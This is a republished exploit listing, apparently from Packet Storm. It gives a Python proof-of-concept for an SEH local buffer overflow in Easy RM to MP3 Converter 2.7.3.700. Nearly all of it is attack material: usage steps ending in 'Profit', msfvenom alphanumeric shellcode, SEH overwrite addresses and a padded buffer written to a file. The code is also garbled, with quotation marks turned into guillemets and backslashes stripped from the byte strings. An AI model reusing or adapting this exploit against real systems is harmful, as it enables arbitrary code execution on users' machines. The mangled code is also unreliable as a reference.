Easy RM To MP3 Converter 2.7.3.700 Local Buffer Overflow ≈ Packet Storm


# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 – ‘Input’ Local Buffer Overflow (SEH)
# Date: 2020-03-26
# Author: Felipe Winsnes
# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe
# Version: 2.7.3.700
# Tested on: Windows 7 (x86)

# Proof of Concept:
# 1.- Run the python script, it will create a new file « poc.txt »
# 2.- Copy the content of the new file ‘poc.txt’ to clipboard
# 3.- Open the Application
# 4.- If the ‘Preferences’ windows pops up, just click ‘Cancel’
# 4.- Click ‘Batch’
# 5.- Delete everything on the parameter ‘Input:’ and paste the clipboard there
# 6.- Select OK
# 7.- Some Windows message boxes will pop up, click OK.
# 8.- Profit

# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/Easy-RM-to-MP3-Converter-2.7.3.700-Input/

import struct
import sys

# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread
# Payload size: 447 bytes

buf = b » »
buf += b »xdbxc4xd9x74x24xf4x58x50x59x49x49x49x49″
buf += b »x49x49x49x49x49x43x43x43x43x43x43x43x37″
buf += b »x51x5ax6ax41x58x50x30x41x30x41x6bx41x41″
buf += b »x51x32x41x42x32x42x42x30x42x42x41x42x58″
buf += b »x50x38x41x42x75x4ax49x4bx4cx6bx58x4dx52″
buf += b »x55x50x73x30x67x70x55x30x6cx49x4ax45x65″
buf += b »x61x69x50x62x44x6cx4bx76x30x46x50x4ex6b »
buf += b »x76x32x46x6cx6cx4bx52x72x65x44x6ex6bx72″
buf += b »x52x74x68x44x4fx4fx47x73x7ax64x66x65x61″
buf += b »x49x6fx4ex4cx47x4cx50x61x71x6cx34x42x66″
buf += b »x4cx71x30x6bx71x58x4fx44x4dx46x61x68x47″
buf += b »x4ax42x6cx32x51x42x63x67x4cx4bx76x32x72″
buf += b »x30x4ex6bx33x7ax35x6cx4cx4bx50x4cx32x31″
buf += b »x31x68x59x73x53x78x55x51x6bx61x70x51x4e »
buf += b »x6bx70x59x47x50x35x51x68x53x6ex6bx51x59″
buf += b »x37x68x6ax43x45x6ax62x69x6cx4bx54x74x6c »
buf += b »x4bx55x51x4ax76x76x51x39x6fx6cx6cx6bx71″
buf += b »x4ax6fx36x6dx77x71x6ax67x77x48x69x70x33″
buf += b »x45x7ax56x64x43x61x6dx68x78x45x6bx53x4d »
buf += b »x66x44x53x45x69x74x70x58x4ex6bx76x38x74″
buf += b »x64x77x71x38x53x52x46x6ex6bx34x4cx72x6b »
buf += b »x6ex6bx56x38x45x4cx57x71x38x53x6cx4bx75″
buf += b »x54x6ex6bx76x61x4ax70x4ex69x67x34x44x64″
buf += b »x31x34x51x4bx73x6bx43x51x30x59x51x4ax53″
buf += b »x61x59x6fx49x70x31x4fx33x6fx63x6ax6cx4b »
buf += b »x57x62x68x6bx6cx4dx73x6dx42x4ax33x31x4c »
buf += b »x4dx4fx75x4ex52x73x30x35x50x47x70x66x30″
buf += b »x51x78x35x61x4ex6bx42x4fx6fx77x59x6fx58″
buf += b »x55x4fx4bx4dx30x35x4dx75x7ax65x5ax63x58″
buf += b »x49x36x4fx65x6dx6dx6dx4dx79x6fx79x45x45″
buf += b »x6cx77x76x33x4cx57x7ax4fx70x6bx4bx69x70″
buf += b »x74x35x57x75x6dx6bx33x77x65x43x43x42x62″
buf += b »x4fx32x4ax37x70x53x63x79x6fx6ax75x33x53″
buf += b »x35x31x72x4cx61x73x54x6ex61x75x61x68x75″
buf += b »x35x57x70x41x41″

nseh = struct.pack(« <I », 0x06710870)
seh = struct.pack(« <I », 0x10025A2E) # 0x10025a2e : pop ecx # pop esi # ret | ascii {PAGE_EXECUTE_READ} [MSRMfilter03.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:Program FilesEasy RM to MP3 ConverterMSRMfilter03.dll)

buffer = « A » * 9008 + nseh + seh + « x41x49 » * 5 + buf + « xff » * 200

try:
f = open (« poc.txt », « w »)
f.write(buffer)
f.close()
print « [+] The file has been created successfully! »

except:
print « [!] There has been an error while creating the file. »



Source link

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *